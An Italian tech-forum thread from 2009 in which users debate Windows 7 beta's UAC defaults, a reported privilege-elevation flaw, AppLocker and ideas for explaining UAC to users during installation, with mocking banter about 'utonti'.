Win7 è in realtà Vista Utonto Edition :D, una edizione espressamente richiesta dagli utonti che non hanno saputo capire il perchè certe cose in Vista sono state fatte in un modo e non in un altro.

Basti anche solo pensare al defrag in Win7 che ora mostra la percentuale di frammentazione e altre informazioni direttamente dalla finestra, nonostante sia inutile mostrarlo, dato che il bello della deframmentazione automatica è il non doversene preoccupare, il non dover stare a perdere tempo a guardare continuamente a che punto è... Quindi il defrag di Win7 è un altro esempio di come hanno accontentato gli utonti, pur sapendo che quello di Vista era già la soluzione migliore.

Non esageriamo, Seven porta molte migliorie a Vista, e chiaramente maggiore personalizzazione.

Poi stiamo ancora in Beta, e l'autore dell'articolo ha detto che Microsoft dovrebbe aver già fixato questa cosa (relativamente a RunDll32) nelle build successive alla Beta.

Scoperta una seconda falla nello UAC di Win7:
http://www.neowin.net/news/main/09/02/04/windows-7-uac-has-a-second-flaw

una seconda falla di sicurezza nello UAC di Win7 permette a un'applicazione di terze parti di elevare se stessa ai privilegi di amministratore senza richiedere l'autorizzazione e senza che venga disabilitato lo UAC.

Cari utonti, avete stupidamente sempre chiesto di avere meno prompt? Ora ciapatelo in quel posto! :ciapet:

Win7's UAC sucks!
Vista's UAC rocks!

Questo semplice trucco è ben più grave del primo in effetti...

Benché apprezzi molto Vista non esageriamo con il minimizzare Win7... semplicemente va accettato per quello che è: una evoluzione meglio ottimizzata (e con qualche feature nuova naturalmente) di Vista.
Gli ignoranti che hanno snobbato Vista lo apprezzeranno e così anche chi ha gradito Vista, essendone una evoluzione ottimizzata, allo stesso modo apprezzerà pur senza gridare al miracolo come gli altri.

Come ha fatto già notare WarDuck alla fine dell'articolo si dice che MS abbia già posto rimedio (interessante sarà capire COME)... Per il resto sappiamo tutti che UAC ha veramente senso solo se applicato al massimo livello, come su Vista, per stare sicuri (ma non è che manchi questa funzionalità a Win 7, faccio notare!).

Per il resto sappiamo tutti che UAC ha veramente senso solo se applicato al massimo livello, come su Vista, per stare sicuri (ma non è che manchi questa funzionalità a Win 7, faccio notare!).Il punto è l'impostazione predefinita.
L'utente non andrà mai a metterlo al massimo. Piuttosto, visto che UAC non l'ha mai visto per roba Microsoft, tranne quando si installa Office o messenger, andrà a cercare la guida su internet per disabilitarlo. Ma mai per tenerlo al massimo.

Ho scoperto che anche nella Beta AppLocker funziona anche con le DLLs :sofico: :

http://img152.imageshack.us/img152/2237/dlllocknt1.jpg (http://imageshack.us)
http://img152.imageshack.us/img152/dlllocknt1.jpg/1/w662.png (http://g.imageshack.us/img152/dlllocknt1.jpg/1/)

Peccato che sarà presente solo nelle versioni Ultimate ed Enterprise :(.

Uppo il thread per segnalarvi questa news:

http://blogs.msdn.com/e7/archive/2009/02/05/uac-feedback-and-follow-up.aspx

Però ha ragione stambeccuccio, l'80% (percentuale a caso? ci vado lontano??) dell'utenza che installerà ma peggio anora comprerà un pc con su win7 non sa nemmeno dell'esistenza di quel sistema per innalzare il livello massimo di uac.
..

La "soluzione" sarebbe l'Uovo di Colombo:
MS deve spiegare bene al momento dell'installazione di Win7 cos'è UAC e come impostarlo, magari tramite un video automatico.
Qualcuno con Win7beta tramite Feedback glielo suggerisca magari... ;)

La "soluzione" sarebbe l'Uovo di Colombo:
MS deve spiegare bene al momento dell'installazione di Win7 cos'è UAC e come impostarlo, magari tramite un video automatico.
Qualcuno con Win7beta tramite Feedback glielo suggerisca magari... ;)
E quanti "utonti" saranno disposti a leggerlo ?
E quanti sanno installarsi il Sistema Operativo ? :)

E quanti "utonti" saranno disposti a leggerlo ?
E quanti sanno installarsi il Sistema Operativo ? :)

Parte da solo il video come la attuale presentazione in cui ti scrive "Windows Vista offre blah blah.." mentre scorre sotto la barra di installazione.

Parte da solo il video come la attuale presentazione in cui ti scrive "Windows Vista offre blah blah.." mentre scorre sotto la barra di installazione.
Video senza skip ?
Allora l'utonto ritornerà al pc una volta finito il video. :eek:

Video senza skip ?
Allora l'utonto ritornerà al pc una volta finito il video. :eek:
Sarebbe cmq efficace per una buona percentuale di utonti. Niente funziona al 100% in campo software ;)

Sarebbe cmq efficace per una buona percentuale di utonti. Niente funziona al 100% in campo software ;)
E ok..proviamoci. :)

Sì, ma poi ci sarebbero lo stesso le solite lamentele, e peggio forse... Video noioso, non posso saltarlo, io non voglio l'UAC e basta (sì, c'è l'utonto che lo direbbe anche se gli spiegheresti per filo e per segno e con termini semplici cos'è e come funziona)... Purtroppo, penso che non avrebbe lo stesso molta efficacia. Però si potrebbe provare, ma con un tasto Skip, almeno quello andrebbe concesso :)

Vero, io che installo più volte non devo essere costretto a guardarlo sempre. Soprattutto visto che già so cosa fa.

Il punto è che il video partirebbe durante l'installazione (= in multitasking). L'utente è comunque in attesa che finisca l'installazione (in media almeno una 15ina/20ina di minuti) e al posto dei messaggini pubblicitari di quanto è bello Win 7 potrebbero invece educare all'UAC.
Il tasto skip in caso dovrebbe comparire solo a installazione ultimata se il video va ancora per le lunghe (più di 20 minuti???)... Perciò non "costringerebbe" nessuno a pause forzate educative ;)

Si tratta solo di usare intelligentemente il tempo durante l'installazione...

Il punto è che il video partirebbe durante l'installazione (= in multitasking).Questo è pensabile sul mio PC, non su tutti. Senza contare che di solito l'utente non installa un bel niente L'utente è comunque in attesa che finisca l'installazione (in media almeno una 15ina/20ina di minuti)Sì, nei tuoi sogni... :stordita:
A meno del raid di Raptor 10 000 giri citato in un altra discussione. :stordita:

(tono ironicamente provocatorio): un tempo, molti molti anni fa, in un paese lontano, usavo un pc il cui SO stava in una rom.
Impossibile virus, impossibile pirateria.
Ci girava un Office con davvero poco di meno dell'OpenOffice e mi ha permesso di svolazzare per tutto il Nord America con Flight Simulator acquistato a New York.....

Ho voluto provare a gettare un sassolino nello stagno.